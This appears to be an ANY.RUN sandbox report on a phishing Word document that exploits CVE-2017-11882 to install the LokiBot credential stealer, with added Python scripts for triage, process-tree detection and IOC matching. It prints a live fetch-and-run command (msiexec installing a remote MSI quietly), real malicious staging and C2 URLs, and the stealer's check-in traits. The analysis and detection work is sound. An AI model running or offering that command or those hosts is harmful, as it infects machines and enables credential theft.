File name: New Order - PO-LBJPS19-01811.docx
Full analysis: https://app.any.run/tasks/7c56a3df-2859-4af6-89ba-667c31e29677
Verdict: Malicious activity
Threats:

LokiBot was developed in 2015 to steal information from a variety of applications. Despite its age, this malware is still popular among cybercriminals.

Analysis date: December 14, 2018, 06:04:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: generated-doc, exploit, CVE-2017-11882, exe-to-msi, trojan, lokibot, opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5: B37879A5ECD333C16F7A192F86855115
SHA1: 5A658A85E90434FB3750D6F210D4B6A695FF2B33
SHA256: D1B1321BEA0B253F8527AF8AE0F32103470F6167CAE585D228840EBBDB515DCF
SSDEEP: 3072:e7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKSIKg:e7lCAdFkYhDFBxvqyRmTMSFmfSe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Uses Microsoft Installer as loader
      • cmd.exe (PID: 2160)
    • Equation Editor starts application (CVE-2017-11882)
      • EQNEDT32.EXE (PID: 3564)
    • LOKIBOT was detected
      • MSIA2C1.tmp (PID: 1328)
    • Detected artifacts of LokiBot
      • MSIA2C1.tmp (PID: 1328)
    • Connects to CnC server
      • MSIA2C1.tmp (PID: 1328)
    • Actions look like stealing of personal data
      • MSIA2C1.tmp (PID: 1328)
  • SUSPICIOUS
    • Drops ExeToMSI application
      • msiexec.exe (PID: 3196)
    • Executable content was dropped or overwritten
      • msiexec.exe (PID: 3196)
      • MSIA2C1.tmp (PID: 1328)
    • Starts CMD.EXE for command execution
      • EQNEDT32.EXE (PID: 3564)
    • Reads Internet Cache Settings
      • MSIA2C1.tmp (PID: 1328)
    • Creates files in the user directory
      • MSIA2C1.tmp (PID: 1328)
    • Loads DLL from Mozilla Firefox
      • MSIA2C1.tmp (PID: 1328)
  • INFO
    • Application crashed
      • EQNEDT32.EXE (PID: 3564)
    • Writes to a desktop.ini file (may be used to cloak folders)
      • msiexec.exe (PID: 3196)
    • Starts application with an unusual extension
      • msiexec.exe (PID: 3196)
      • MSIA2C1.tmp (PID: 2980)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3320)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3320)
    • Application was dropped or rewritten from another process
      • MSIA2C1.tmp (PID: 1328)
      • MSIA2C1.tmp (PID: 2980)
    • Application launched itself
      • MSIA2C1.tmp (PID: 2980)
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2ea8411c
ZipCompressedSize: 351
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2018:12:11 23:39:00Z
ModifyDate: 2018:12:11 23:39:00Z

XMP

Title: -
Subject: -
Creator: Windows User
Description: -
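The metadata above carries two traits a triage queue can key on before detonation: every ZIP entry is stamped 1980:01:01 00:00:00 (the ZIP epoch, which real Word saves do not produce and which matches the generated-doc tag), and the document came from a stock template.dotx. The third trait, the embedded Equation Editor object that CVE-2017-11882 needs, is not printed in the EXIF block but is what the EQNEDT32.EXE launch below implies. The following script is an added example, not ANY.RUN's code and not the sample itself: build_constructed_docx() assembles a minimal stand-in OOXML container with those three traits (the document XML and the OLE stream bytes are constructed), and triage_docx() runs the checks on it.

```python
"""Static triage of a .docx for the traits this report's metadata shows.

Added example (not ANY.RUN's code). The sample itself is not available here,
so build_constructed_docx() assembles a stand-in OOXML container that carries
the same tell-tale traits: every ZIP entry stamped 1980-01-01 00:00:00 (as in
the ZipModifyDate above), a Template of template.dotx, and an embedded OLE
object whose ProgID is Equation.3, the Equation Editor component abused by
CVE-2017-11882. The XML and OLE bytes are a constructed minimum, not the
real sample's content.
"""
import io
import re
import zipfile

EQUATION_PROGID = "Equation.3"                    # ProgID of Microsoft Equation Editor 3.0
ZIP_EPOCH = (1980, 1, 1, 0, 0, 0)                 # earliest timestamp a ZIP entry can hold
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # compound-file header signature


def build_constructed_docx() -> bytes:
    """Constructed stand-in for the sample (assumption: not the real file)."""
    parts = {
        "[Content_Types].xml":
            '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "docProps/app.xml":
            "<Properties><Template>template.dotx</Template>"
            "<Application>Microsoft Office Word</Application>"
            "<AppVersion>15.0000</AppVersion></Properties>",
        "word/document.xml":
            "<w:document><w:body><w:p><w:r><w:object>"
            '<o:OLEObject Type="Embed" ProgID="Equation.3" ShapeID="_x0000_i1025" '
            'DrawAspect="Content" ObjectID="_1" r:id="rId4"/>'
            "</w:object></w:r></w:p></w:body></w:document>",
        # OLE2 header magic plus padding stands in for the real object stream
        "word/embeddings/oleObject1.bin": OLE2_MAGIC + b"\x00" * 504,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in parts.items():
            info = zipfile.ZipInfo(name, date_time=ZIP_EPOCH)  # generator-style timestamp
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
    return buf.getvalue()


def _tag(xml: str, name: str) -> str:
    """Pull the text of a simple <name>...</name> element, '-' when absent."""
    m = re.search(rf"<{name}>([^<]*)</{name}>", xml)
    return m.group(1) if m else "-"


def triage_docx(data: bytes) -> dict:
    """Return the static findings a triage queue would key on before detonation."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        stamped_1980 = [i.filename for i in zf.infolist() if i.date_time == ZIP_EPOCH]
        doc_xml = zf.read("word/document.xml").decode("utf-8", "replace") if "word/document.xml" in names else ""
        app_xml = zf.read("docProps/app.xml").decode("utf-8", "replace") if "docProps/app.xml" in names else ""
        embeddings = [n for n in names if n.startswith("word/embeddings/")]
        ole_streams = [n for n in embeddings if zf.read(n)[:8] == OLE2_MAGIC]
    progids = re.findall(r'ProgID="([^"]+)"', doc_xml)
    findings = {
        "all_entries_1980": len(stamped_1980) == len(names),
        "template": _tag(app_xml, "Template"),
        "app_version": _tag(app_xml, "AppVersion"),
        "ole_progids": progids,
        "ole_streams": ole_streams,
        "equation_editor_object": EQUATION_PROGID in progids,
    }
    # Equation Editor was removed from Office in January 2018, so any Equation.3
    # object deserves detonation on its own; epoch timestamps plus an OLE stream
    # are the weaker, generator-style signal.
    findings["detonate"] = findings["equation_editor_object"] or (
        findings["all_entries_1980"] and bool(ole_streams))
    return findings


if __name__ == "__main__":
    for key, value in triage_docx(build_constructed_docx()).items():
        print(f"{key}: {value}")
```

To use it on a real file, pass the bytes of the .docx to triage_docx() instead of the constructed container. The ProgID check only covers objects declared in word/document.xml; an object referenced from a header, footer or the relationships file would need the same regex run over those parts as well, and a packed or encrypted document will not expose the ProgID at all, which is itself a reason to detonate.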
Screenshots: available in the full report.
Total processes: 40
Monitored processes: 8
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Process tree, reconstructed from the process table below (ANY.RUN marks processes it did not monitor in detail as "no specs"):

explorer.exe
  └ WINWORD.EXE (PID 3320): opens New Order - PO-LBJPS19-01811.docx
svchost.exe
  └ EQNEDT32.EXE (PID 3564) -Embedding: CVE-2017-11882, crashes after spawning
      └ cmd.exe (PID 2160, no specs): CD C: & msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet
          └ msiexec.exe (PID 2904, no specs): client-side install of the remote MSI
svchost.exe
  └ EQNEDT32.EXE (PID 2336, no specs) -Embedding
services.exe
  └ msiexec.exe (PID 3196) /V: Windows Installer service, SYSTEM; drops the EXE wrapped in the MSI
      └ MSIA2C1.tmp (PID 2980, no specs): dropped executable started with a .tmp extension
          └ MSIA2C1.tmp (PID 1328): relaunched copy, #LOKIBOT, C2 traffic

Process information

PID 3320: WINWORD.EXE
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\New Order - PO-LBJPS19-01811.docx"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Exit code: 0
  Version: 14.0.6024.1000

PID 3564: EQNEDT32.EXE
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: svchost.exe
  User: admin
  Company: Design Science, Inc.
  Integrity Level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 2160: cmd.exe
  CMD: cmd.exe & /C CD C: & msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet
  Path: C:\Windows\system32\cmd.exe
  Parent process: EQNEDT32.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 2904: msiexec.exe
  CMD: msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet
  Path: C:\Windows\system32\msiexec.exe
  Parent process: cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows® installer
  Exit code: 0
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 3196: msiexec.exe
  CMD: C:\Windows\system32\msiexec.exe /V
  Path: C:\Windows\system32\msiexec.exe
  Parent process: services.exe
  User: SYSTEM
  Company: Microsoft Corporation
  Integrity Level: SYSTEM
  Description: Windows® installer
  Exit code: (still running at the end of the analysis)
  Version: 5.0.7600.16385 (win7_rtm.090713-1255)

PID 2336: EQNEDT32.EXE
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: svchost.exe
  User: admin
  Company: Design Science, Inc.
  Integrity Level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 2980: MSIA2C1.tmp
  CMD: "C:\Windows\Installer\MSIA2C1.tmp"
  Path: C:\Windows\Installer\MSIA2C1.tmp
  Parent process: msiexec.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0
  (no Company, Description or Version recorded)

PID 1328: MSIA2C1.tmp
  CMD: "C:\Windows\Installer\MSIA2C1.tmp"
  Path: C:\Windows\Installer\MSIA2C1.tmp
  Parent process: MSIA2C1.tmp
  User: admin
  Integrity Level: MEDIUM
  Exit code: (still running at the end of the analysis)
  (no Company, Description or Version recorded)
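The process table is the part of this report that turns into durable detection content: Equation Editor spawning anything, msiexec.exe installing from a URL, and an executable running out of C:\Windows\Installer with a .tmp name. The script below is an added example, not ANY.RUN's code: SAMPLE_EVENTS is constructed from the eight processes above (PIDs, images, command lines and parent image names exactly as listed; the report gives parent names, not parent PIDs), and the rule names, the ProcEvent record and the regexes are this example's own.

```python
"""Process-tree detections for the delivery chain in this report.

Added example (not ANY.RUN's code). SAMPLE_EVENTS is constructed from the
process table above; parent_image holds the parent's name as the sandbox
reports it, since the report does not give parent PIDs. Rule names are this
example's own.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the executable
    cmdline: str
    parent_image: str   # parent's image name as reported by the sandbox
    user: str


OFFICE14 = r"C:\Program Files\Microsoft Office\Office14"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
MSI_URL = "https://vkingsolutions.com/css/secured/baz.msi"

SAMPLE_EVENTS = [
    ProcEvent(3320, OFFICE14 + r"\WINWORD.EXE",
              f'"{OFFICE14}\\WINWORD.EXE" /n "C:\\Users\\admin\\AppData\\Local\\Temp\\New Order - PO-LBJPS19-01811.docx"',
              "explorer.exe", "admin"),
    ProcEvent(3564, EQNEDT, f'"{EQNEDT}" -Embedding', "svchost.exe", "admin"),
    ProcEvent(2160, r"C:\Windows\system32\cmd.exe",
              f"cmd.exe & /C CD C: & msiexec.exe /i {MSI_URL} /quiet", "EQNEDT32.EXE", "admin"),
    ProcEvent(2904, r"C:\Windows\system32\msiexec.exe", f"msiexec.exe /i {MSI_URL} /quiet", "cmd.exe", "admin"),
    ProcEvent(3196, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V", "services.exe", "SYSTEM"),
    ProcEvent(2336, EQNEDT, f'"{EQNEDT}" -Embedding', "svchost.exe", "admin"),
    ProcEvent(2980, r"C:\Windows\Installer\MSIA2C1.tmp", r'"C:\Windows\Installer\MSIA2C1.tmp"', "msiexec.exe", "admin"),
    ProcEvent(1328, r"C:\Windows\Installer\MSIA2C1.tmp", r'"C:\Windows\Installer\MSIA2C1.tmp"', "MSIA2C1.tmp", "admin"),
]

# msiexec invoked with /i (or -i) and a URL: the package is fetched from the
# network instead of a local path (the "Uses Microsoft Installer as loader" hit).
MSIEXEC_REMOTE = re.compile(r"msiexec(?:\.exe)?\s+(?:.*\s)?[/-]i\s+(https?://\S+)", re.IGNORECASE)
# Executables extracted by the Installer service carry MSI<hex>.tmp names.
INSTALLER_TMP = re.compile(r"\\Windows\\Installer\\MSI[0-9A-F]+\.tmp$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def extract_msi_url(cmdline: str) -> Optional[str]:
    """The package URL when msiexec is told to install from the network, else None."""
    m = MSIEXEC_REMOTE.search(cmdline)
    return m.group(1) if m else None


def run_rules(events: Iterable[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) pairs; one PID may trigger more than one rule."""
    hits = []
    for ev in events:
        # Equation Editor renders OLE math objects and never needs a child process.
        if ev.parent_image.upper() == "EQNEDT32.EXE":
            hits.append(("equation_editor_spawns_child", ev.pid))
        if extract_msi_url(ev.cmdline):
            hits.append(("msiexec_remote_install", ev.pid))
        if INSTALLER_TMP.search(ev.image):
            hits.append(("installer_tmp_exec", ev.pid))
            # A .tmp whose parent is its own image is the self-launch seen at PID 1328.
            if basename(ev.image).upper() == ev.parent_image.upper():
                hits.append(("installer_tmp_self_launch", ev.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in run_rules(SAMPLE_EVENTS):
        print(f"{rule:32} pid={pid}")
    print("remote MSI:", extract_msi_url(SAMPLE_EVENTS[2].cmdline))
```

Against the constructed events the rules fire on PIDs 2160, 2904, 2980 and 1328 and stay silent on Word, both Equation Editor instances and the SYSTEM Installer service, which is the split the report's MALICIOUS/INFO sections make. Two caveats for production use: key the parent check on the parent's full image path or PID rather than its name, since a name is trivially spoofed, and treat the .tmp rule as a loader indicator only; the Installer service legitimately writes MSI*.tmp helpers, so the alert is the combination with the remote /i install, not the .tmp alone.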
Total events: 1 791
Read events: 1 221
Write events: 0
Delete events: 0

Modification events: no data

Executable files: 3
Suspicious files: 37
Text files: 15
Unknown types: 7

Dropped files

All files in this excerpt are written by WINWORD.EXE (PID 3320); the downloaded MSI and the dropped MSIA2C1.tmp are not listed here. Type and hashes are given where the report shows them.

C:\Users\admin\AppData\Local\Temp\CVR8505.tmp.cvr
  Type: -  MD5: -  SHA256: -
C:\Users\admin\AppData\Local\Temp\{6B26F23A-3250-4FF7-8DA3-331B4F5EB084}
  Type: -  MD5: -  SHA256: -
C:\Users\admin\AppData\Local\Temp\{6BB91254-169B-4812-875B-4F285D828E1A}
  Type: -  MD5: -  SHA256: -
C:\Users\admin\AppData\Local\Temp\{6A17FB15-5F20-4CB2-B2A2-4FAD02D4CB4D}
  Type: -  MD5: -  SHA256: -
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A01C260-6B0A-4A81-B6EF-9A5EB442D5E3}.FSD
  Type: binary
  MD5: BED4679A049BDF2DE31D6CCC8842C4E0
  SHA256: F67F13DE367EF2360F542F08C4F48E57980E3B1C7500023EAEAD52070922BDC1
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
  Type: binary
  MD5: 27691E6A32A9EF1B3F5BF840A060B3E1
  SHA256: BDD5F0F8B8D303AB8ABE8C02EAF2523CEC9C077D50425D1DEA5E5163CB744D05
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Type: binary
  MD5: 35290DB82F7B2F8111044FE46F41417A
  SHA256: E7B1CCFDD45A164133C74E249F6DE076400B99B708EFC1D68069473154D88FB3
C:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
  Type: binary
  MD5: 33B7505E5CA00C0CA710521D0CFEB5BA
  SHA256: 1B4284FFBA8839672E90583A9D39953AE1DAC4C4BA1E75BCB0B9D0D342DD2509
C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: pgc
  MD5: 0FEE22FA40EAB618E269AF59EF990721
  SHA256: DB543AC7F35DE26670D8A65A74DD48BCF6E5E70FF2A75D8A42E2FD500F8A170D
C:\Users\admin\AppData\Local\Temp\~$w Order - PO-LBJPS19-01811.docx
  Type: pgc
  MD5: 2A466149C7115F4A1C3EED12F515FD71
  SHA256: C55F00C42A133552917765412354813B6655EB0611101809CF55904B3718A42E
HTTP(S) requests: 4
TCP/UDP connections: 7
DNS requests: 2
Threats: 0

HTTP requests

All four requests are the same POST from the LokiBot process; the HTTP code, content type and size columns are empty in the report.

PID   Process      Method  IP                URL                                         CN  Reputation
1328  MSIA2C1.tmp  POST    104.24.119.38:80  http://e-vam.ir/wp-includes/themes/fre.php  US  malicious
1328  MSIA2C1.tmp  POST    104.24.119.38:80  http://e-vam.ir/wp-includes/themes/fre.php  US  malicious
1328  MSIA2C1.tmp  POST    104.24.119.38:80  http://e-vam.ir/wp-includes/themes/fre.php  US  malicious
1328  MSIA2C1.tmp  POST    104.24.119.38:80  http://e-vam.ir/wp-includes/themes/fre.php  US  malicious

Connections

PID   Process      IP                  Domain              ASN             CN  Reputation
3196  msiexec.exe  195.201.197.24:443  vkingsolutions.com  Awanti Ltd.     RU  unknown
1328  MSIA2C1.tmp  104.24.119.38:80    e-vam.ir            Cloudflare Inc  US  shared
3320  WINWORD.EXE  195.201.197.24:443  vkingsolutions.com  Awanti Ltd.     RU  unknown

DNS requests

Domain              IP(s)                         Reputation
vkingsolutions.com  195.201.197.24                unknown
e-vam.ir            104.24.119.38, 104.24.118.38  malicious

Threats

Each of the five IDS alerts below fired twice (ten alerts in total), all on the traffic of the LokiBot process.

PID   Process      Class                          Message
1328  MSIA2C1.tmp  A Network Trojan was detected  ET TROJAN LokiBot User-Agent (Charon/Inferno)
1328  MSIA2C1.tmp  A Network Trojan was detected  ET TROJAN LokiBot Checkin
1328  MSIA2C1.tmp  A Network Trojan was detected  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1328  MSIA2C1.tmp  A Network Trojan was detected  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1328  MSIA2C1.tmp  A Network Trojan was detected  MALWARE [PTsecurity] Loki Bot Check-in M2
4 ETPRO signatures available at the full report
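The network sections above give the indicators worth sharing and matching: the staging domain for the MSI, the C2 URL, and the two Cloudflare addresses behind e-vam.ir (the second one appears only in the DNS answer, so an IP list built from the connection table alone would miss it). The script below is an added example, not ANY.RUN's code. REPORT_IOCS is taken from the Connections, DNS and HTTP tables; SAMPLE_LOG is a constructed proxy log; and the User-Agent "Mozilla/4.08 (Charon; Inferno)" is the value the "ET TROJAN LokiBot User-Agent (Charon/Inferno)" signature name refers to, which is an assumption here because the report does not print the request headers.

```python
"""Turn the network section of this report into reusable detection content.

Added example (not ANY.RUN's code). REPORT_IOCS holds the domains, IPs and
URLs from the Connections, DNS and HTTP tables above. SAMPLE_LOG is a
constructed proxy log. LOKIBOT_UA is assumed: it is the User-Agent the ET
"LokiBot User-Agent (Charon/Inferno)" signature name refers to, not a header
the report shows.
"""
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

REPORT_IOCS: Dict[str, set] = {
    "domains": {"vkingsolutions.com", "e-vam.ir"},
    "ips": {"195.201.197.24", "104.24.119.38", "104.24.118.38"},
    "urls": {"http://e-vam.ir/wp-includes/themes/fre.php",
             "https://vkingsolutions.com/css/secured/baz.msi"},
}
LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"   # assumed C2 User-Agent

# Constructed proxy log: client, method, URL, status, user-agent (tab separated).
SAMPLE_LOG = """\
10.0.0.15\tPOST\thttp://e-vam.ir/wp-includes/themes/fre.php\t200\tMozilla/4.08 (Charon; Inferno)
10.0.0.15\tGET\thttps://vkingsolutions.com/css/secured/baz.msi\t200\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)
10.0.0.22\tGET\thttps://www.example.org/index.html\t200\tMozilla/5.0 (Windows NT 6.1)
10.0.0.31\tPOST\thttp://104.24.118.38/wp-includes/themes/fre.php\t200\tMozilla/4.08 (Charon; Inferno)
"""


def defang(ioc: str) -> str:
    """hxxp:// and [.] in the host so the indicator cannot be clicked or auto-linked."""
    if "://" in ioc:
        parts = urlsplit(ioc)
        scheme = parts.scheme.replace("http", "hxxp")
        return f"{scheme}://{parts.netloc.replace('.', '[.]')}{parts.path}"
    return ioc.replace(".", "[.]")


def ioc_block() -> List[str]:
    """Defanged, sorted indicator list ready to paste into a report or ticket."""
    return sorted(defang(i) for kind in ("domains", "ips", "urls") for i in REPORT_IOCS[kind])


def match_line(line: str) -> List[str]:
    """Reasons a single log line matches this report's indicators (empty = clean)."""
    _client, method, url, _status, ua = line.split("\t")
    host = urlsplit(url).hostname or ""
    reasons = []
    if url in REPORT_IOCS["urls"]:
        reasons.append("ioc_url")
    if host in REPORT_IOCS["domains"]:
        reasons.append("ioc_domain")
    if host in REPORT_IOCS["ips"]:
        reasons.append("ioc_ip")
    # The check-in is a POST; the UA alone is the weakest signal, so pair it with the method.
    if method == "POST" and ua == LOKIBOT_UA:
        reasons.append("lokibot_user_agent")
    return reasons


def scan(log: str) -> List[Tuple[str, str, List[str]]]:
    """(client, url, reasons) for every log line that matched at least one rule."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        reasons = match_line(line)
        if reasons:
            client, _method, url, _status, _ua = line.split("\t")
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan(SAMPLE_LOG):
        print(f"{client:12} {defang(url):55} {','.join(reasons)}")
    print("\n".join(ioc_block()))
```

Two points the matches illustrate. The e-vam.ir addresses belong to Cloudflare, which the report itself rates "shared": an IP-only hit (the fourth line) is a lead, not a verdict, until the domain or the UA confirms it. And the vkingsolutions.com GET is the MSI being staged, so it matches on URL and domain but carries no LokiBot UA; that is the fetch to look for in proxy logs when hunting for the first stage of this chain rather than the C2 traffic.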